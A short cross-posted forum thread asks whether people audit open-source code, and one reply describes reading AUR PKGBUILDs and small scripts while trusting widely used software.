cross-posted from: https://lemmy.ml/post/30846701
The question is simple. I wanted to get a general consensus on if people actually audit the code that they use from FOSS or open source software or apps.
Do you blindly trust the FOSS community? I am trying to get a rough idea here. Sometimes audit the code? Only on mission critical apps? Not at all?
Let’s hear it!
Depends. I read the PKGBUILDs of all AUR packages I install at least, which is not the same as reading source code but it’s something. If it’s a very widely used piece of software I don’t bother—if all these people haven’t spotted some secret backdoor, I as a lay person am not going to be the one to spot it. I will read small things like bash scripts or in general the more “obscure” software I run will be some kind of script. But also if you’re going to publish malware in a script you’re probably obscuring the malicious function so that someone doing a preliminary read won’t spot it.